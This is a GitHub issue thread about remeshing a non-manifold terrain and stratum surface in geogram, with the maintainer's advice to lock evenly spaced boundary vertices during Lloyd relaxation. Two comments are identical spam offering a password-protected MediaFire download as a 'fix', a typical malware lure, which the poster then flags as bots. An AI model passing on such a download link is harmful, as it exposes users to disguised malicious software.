### ISSUE TITLE
Does geogram support non-manifold surface isotropic remeshing while maintaining its non-manifold?

### ISSUE THREAD

**Issue by citystrawman** [BrunoLevy/geogram#170]
First I want to say thank you guys for sharing such a powerful tool. 
Here's my question:  I have a non-manifold surface which has its screenshot as follows:
![image](https://github.com/user-attachments/assets/1e330e93-06a1-4891-bbc6-1a6df0bf9114)
the non-manifold edges comes from the underlayer surface:
![image](https://github.com/user-attachments/assets/718f9900-f3e2-40e6-91b9-07f1996b5ee9)

This surface mesh is aimed to simulate a mountain slope and the stratum underneath, and it is actually generated by intersecting the mountain slope surface mesh and the stratum layer mesh:
![image](https://github.com/user-attachments/assets/d16d2efa-7a56-4d17-8652-79e26624eabf) 
thus the boundry between stratum layer and mountain slope is filled with small and irregular triangles.

What I want to do is to isotropic remesh this model while maintaining the boundry vertices connecting mountain slope and stratum still keep connected. I tried to isotropic remesh it using [Geobox](https://brunolevy.github.io/geogram/emscripten/geobox.html) and set nb_points to be 25000, then the output remesh is shown as follows:
![image](https://github.com/user-attachments/assets/c8f48f49-bfb8-4fe3-a93a-e4c75043335b)
open it in meshlab:
![image](https://github.com/user-attachments/assets/c8e2ce38-ecc4-46f1-8c6d-b9235dcd558e)
and it seems that the boundary vertices connecting mountain slope and stratum are detached. 

Is it possible to keep these boundry vertices still keep connected? I will appreciate if anyone help me solve this issue.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by citystrawman** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Are these accounts bots? why they replay so quick and all replies are same?

**Comment by BrunoLevy** [comment]
P.S. did you see the same type of answer elsewere ? (would be good to signal them so that they are removed as well).

**Comment by citystrawman** [comment]
> P.S. did you see the same type of answer elsewere ? (would be good to signal them so that they are removed as well).

No. I do not see these answers from other place.

**Comment by BrunoLevy** [comment]
Remeshing with preservation of non-manifold contacts is not implemented in Geogram. There are two possiblities:

1. modify the remeshing algorithm. You will need to generate vertices along all the non-manifold edges (using for instance the curvilinear absissa to generate an even spacing of the vertices), then mark the new vertices as 'locked' so that they are not moved away by Lloyd relaxation, then generate the new vertices and relax them with Llloyd.

- [main remeshing function](https://github.com/BrunoLevy/geogram/blob/a0bb325a9bcdd71b7f0fed9e2ed04e1f4175d089/src/lib/geogram/mesh/mesh_remesh.cpp#L62)
-  [Centroidal Voronoi Tesselation](https://github.com/BrunoLevy/geogram/blob/main/src/lib/geogram/voronoi/CVT.h)
- CentroidalVoronoiTesselation has a `lock_point()` function, see programmer's reference [here](https://brunolevy.github.io/geogram/classGEO_1_1CentroidalVoronoiTesselation.html#details) 

2. [Tessael](https://www.tessael.com/) markets a geogram-based GeO2 solution that has a non-manifold aware mesh repair tool, specialized for reservoir modeling and gridding (usage scenario seems to be quite similar to yours), so you may also contact them.

**Comment by citystrawman** [comment]
> Remeshing with preservation of non-manifold contacts is not implemented in Geogram. There are two possiblities:
> 
> 1. modify the remeshing algorithm. You will need to generate vertices along all the non-manifold edges (using for instance the curvilinear absissa to generate an even spacing of the vertices), then mark the new vertices as 'locked' so that they are not moved away by Lloyd relaxation, then generate the new vertices and relax them with Llloyd.
>    Here is a list of relevant files in geogram:
> 
> * [main remeshing function](https://github.com/BrunoLevy/geogram/blob/a0bb325a9bcdd71b7f0fed9e2ed04e1f4175d089/src/lib/geogram/mesh/mesh_remesh.cpp#L62)
> * [Centroidal Voronoi Tesselation](https://github.com/BrunoLevy/geogram/blob/main/src/lib/geogram/voronoi/CVT.h)
> * CentroidalVoronoiTesselation has a `lock_point()` function, see programmer's reference [here](https://brunolevy.github.io/geogram/classGEO_1_1CentroidalVoronoiTesselation.html#details)
> 
> 2. [Tessael](https://www.tessael.com/) markets a geogram-based GeO2 solution that has a non-manifold aware mesh repair tool, specialized for reservoir modeling and gridding (usage scenario seems to be quite similar to yours), so you may also contact them.

Dear BrunoLevy, in your first solution, you mentioned using curvilinear absissa to generate an even spacing of the vertices, 
Do you mean collecting all the intersect vertices along the non-manifold edges, and then from these vertices choose those that are almost equally spaced(at target triangle length), and lock these vertices, then do the rermesh?

**Comment by BrunoLevy** [comment]
Yes, that's more or less the idea (with a small difference: you may generate new vertices, that are not necessarily existing in the intersection). A polygonal line can be considered as a parametric function, that maps a "time" t to a position along the line (you "travel" along the line at constant speed), then you generate the points for t/N, 2t/N, 3t/N ...
